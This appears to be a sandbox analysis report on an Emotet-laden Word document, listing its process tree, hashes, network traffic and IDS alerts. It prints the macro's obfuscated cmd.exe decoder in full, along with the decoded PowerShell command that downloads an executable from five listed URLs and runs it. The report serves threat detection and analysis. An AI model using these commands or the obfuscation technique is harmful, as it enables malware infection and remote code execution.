File name: | 5075318902385-107-0_attach.1.I_612442_120418.doc |
Full analysis: | https://app.any.run/tasks/706e5b91-b356-461a-8601-d1d9c5490dc9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 11:55:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 12:10:00 2018, Last Saved Time/Date: Tue Dec 4 12:10:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0 |
MD5: | 932ECBED801FFCA6C95BF62A20DE80E9 |
SHA1: | CBBC10BDE3CBFBADC899ACA574C783A137D24490 |
SHA256: | 7ADCE67E64F12EC6F6D31A9B22D71EFB2B80F8E1A393DFA0E019E4A83685312F |
SSDEEP: | 768:S84OEKjmW9/MqtBMENPOgHvgn+1o98Dcxz99XOOLr5Xbg9LoZnULO5Sjo:S87ljmW9/bvFM+a98Dc3dtXM9UZUy5eo |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 27 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 24 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2018:12:04 12:10:00 |
CreateDate: | 2018:12:04 12:10:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2820 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\5075318902385-107-0_attach.1.I_612442_120418.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3884 | c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68;72;17;40;48;72;55;16;12;5;27;68;21;67;14;70;5;42;44;67;71;27;53;11;67;27;24;62;67;42;13;8;64;67;21;27;55;16;73;5;4;68;72;37;27;27;0;19;54;54;10;71;66;42;67;70;10;10;0;24;71;5;65;54;50;51;40;8;23;45;4;30;25;37;27;27;0;19;54;54;71;8;5;9;37;8;52;42;24;71;5;65;54;42;30;37;38;27;73;69;25;37;27;27;0;19;54;54;22;67;56;5;12;65;71;24;0;8;54;0;66;42;54;26;50;67;67;6;18;57;56;14;12;25;37;27;27;0;19;54;54;71;52;12;67;67;12;73;64;21;21;24;64;21;54;21;8;32;71;0;11;58;34;47;8;25;37;27;27;0;19;54;54;42;12;5;58;52;21;40;52;65;64;8;28;24;5;12;58;54;1;59;73;45;21;30;47;50;30;72;24;2;0;8;64;27;63;72;25;72;39;55;16;2;18;60;68;72;5;1;20;72;55;16;1;57;2;53;68;53;72;29;69;36;72;55;16;56;15;8;68;72;13;26;9;72;55;16;51;52;14;68;16;67;21;10;19;27;67;65;0;46;72;33;72;46;16;1;57;2;46;72;24;67;61;67;72;55;40;5;12;67;52;71;37;63;16;73;48;7;53;64;21;53;16;73;5;4;39;31;27;12;28;31;16;12;5;27;24;49;5;14;21;8;5;52;22;17;64;8;67;63;16;73;48;7;35;53;16;51;52;14;39;55;16;43;10;1;68;72;51;6;20;72;55;1;40;53;63;63;60;67;27;70;1;27;67;65;53;16;51;52;14;39;24;8;67;21;58;27;37;53;70;58;67;53;32;50;50;50;50;39;53;31;1;21;10;5;56;67;70;1;27;67;65;53;16;51;52;14;55;16;21;52;26;68;72;56;37;51;72;55;42;12;67;52;56;55;41;41;71;52;27;71;37;31;41;41;16;43;20;37;68;72;34;37;20;72;55;75)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2392 | CmD /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68;72;17;40;48;72;55;16;12;5;27;68;21;67;14;70;5;42;44;67;71;27;53;11;67;27;24;62;67;42;13;8;64;67;21;27;55;16;73;5;4;68;72;37;27;27;0;19;54;54;10;71;66;42;67;70;10;10;0;24;71;5;65;54;50;51;40;8;23;45;4;30;25;37;27;27;0;19;54;54;71;8;5;9;37;8;52;42;24;71;5;65;54;42;30;37;38;27;73;69;25;37;27;27;0;19;54;54;22;67;56;5;12;65;71;24;0;8;54;0;66;42;54;26;50;67;67;6;18;57;56;14;12;25;37;27;27;0;19;54;54;71;52;12;67;67;12;73;64;21;21;24;64;21;54;21;8;32;71;0;11;58;34;47;8;25;37;27;27;0;19;54;54;42;12;5;58;52;21;40;52;65;64;8;28;24;5;12;58;54;1;59;73;45;21;30;47;50;30;72;24;2;0;8;64;27;63;72;25;72;39;55;16;2;18;60;68;72;5;1;20;72;55;16;1;57;2;53;68;53;72;29;69;36;72;55;16;56;15;8;68;72;13;26;9;72;55;16;51;52;14;68;16;67;21;10;19;27;67;65;0;46;72;33;72;46;16;1;57;2;46;72;24;67;61;67;72;55;40;5;12;67;52;71;37;63;16;73;48;7;53;64;21;53;16;73;5;4;39;31;27;12;28;31;16;12;5;27;24;49;5;14;21;8;5;52;22;17;64;8;67;63;16;73;48;7;35;53;16;51;52;14;39;55;16;43;10;1;68;72;51;6;20;72;55;1;40;53;63;63;60;67;27;70;1;27;67;65;53;16;51;52;14;39;24;8;67;21;58;27;37;53;70;58;67;53;32;50;50;50;50;39;53;31;1;21;10;5;56;67;70;1;27;67;65;53;16;51;52;14;55;16;21;52;26;68;72;56;37;51;72;55;42;12;67;52;56;55;41;41;71;52;27;71;37;31;41;41;16;43;20;37;68;72;34;37;20;72;55;75)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2268 | powershell.exe "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='http://vcube-vvp.com/0Tfl6UZQ@http://closhlab.com/bQh2tz4@http://dekormc.pl/pub/H0eeOPRkwr@http://careerzinn.in/nl8cpNgBAl@http://broganfamily.org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3992 | "C:\Users\admin\AppData\Local\Temp\145.exe" | C:\Users\admin\AppData\Local\Temp\145.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2892 | "C:\Users\admin\AppData\Local\Temp\145.exe" | C:\Users\admin\AppData\Local\Temp\145.exe | 145.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2252 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 145.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2912 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Version: 6.1.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8543.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T8IWZX5I4CRFZ7G5GPD9.temp | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\145.exe | executable | |
MD5:A9FC2E3F2214B0A0BBE086CCAE159326 | SHA256:0856C826B6EA200923A482B2480E7F1A6231BBD052C0F27614C0E6BF7E58B4DC | |||
2892 | 145.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:A9FC2E3F2214B0A0BBE086CCAE159326 | SHA256:0856C826B6EA200923A482B2480E7F1A6231BBD052C0F27614C0E6BF7E58B4DC | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199706.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$75318902385-107-0_attach.1.I_612442_120418.doc | pgc | |
MD5:31E469AAB761041FBCA3A008AE78CC0B | SHA256:F92F901B39E5F60C1166794818F22BAC5AEFA4B7C2011F7D8AA26D41A92CAECF | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2268 | powershell.exe | GET | 404 | 69.65.3.251:80 | http://closhlab.com/bQh2tz4 | US | html | 20.2 Kb | malicious |
2268 | powershell.exe | GET | 404 | 103.246.17.7:80 | http://vcube-vvp.com/0Tfl6UZQ | TH | html | 325 b | malicious |
2268 | powershell.exe | GET | 301 | 79.96.69.212:80 | http://dekormc.pl/pub/H0eeOPRkwr | PL | html | 189 b | suspicious |
2268 | powershell.exe | GET | 200 | 79.96.69.212:80 | http://dekormc.pl/pub/H0eeOPRkwr/ | PL | executable | 164 Kb | suspicious |
2912 | archivesymbol.exe | GET | 200 | 142.169.99.1:7080 | http://142.169.99.1:7080/ | CA | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2268 | powershell.exe | 103.246.17.7:80 | vcube-vvp.com | POPIDC powered by CSLoxinfo | TH | malicious |
2268 | powershell.exe | 79.96.69.212:80 | dekormc.pl | home.pl S.A. | PL | suspicious |
2268 | powershell.exe | 69.65.3.251:80 | closhlab.com | GigeNET | US | suspicious |
2912 | archivesymbol.exe | 142.169.99.1:7080 | — | TELUS Communications Inc. | CA | malicious |
Domain | IP | Reputation |
---|---|---|
vcube-vvp.com |
| malicious |
closhlab.com |
| malicious |
dekormc.pl |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2268 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2268 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2268 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2268 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2268 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2912 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |